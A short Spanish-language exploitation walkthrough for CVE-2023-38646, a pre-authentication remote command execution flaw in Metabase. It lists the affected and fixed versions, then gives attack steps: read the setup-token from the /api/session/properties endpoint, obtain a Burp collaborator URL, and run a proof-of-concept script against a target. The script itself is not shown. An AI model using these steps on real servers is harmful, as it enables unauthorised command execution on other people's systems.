
RCE pre-autenticación en Metabase

Metabase de código abierto anterior a 0.46.6.1 y Metabase Enterprise anterior a 1.46.6.1 permiten a los atacantes ejecutar comandos arbitrarios en el servidor, con el nivel de privilegios del servidor. No se requiere autenticación para la explotación. Las otras versiones corregidas son 0.45.4.1, 1.45.4.1, 0.44.7.1, 1.44.7.1, 0.43.7.2 y 1.43.7.2.
Navega a http://vulnerablehost.com/api/session/properties
Identifica el "setup-token"

Obtén una URL de colaborador (probado con BurpSuite)
Ejecuta el script del PoC con:
python3 CVE-2023-38646.py -u <target> -t <setup-token> -c <collaborator-url>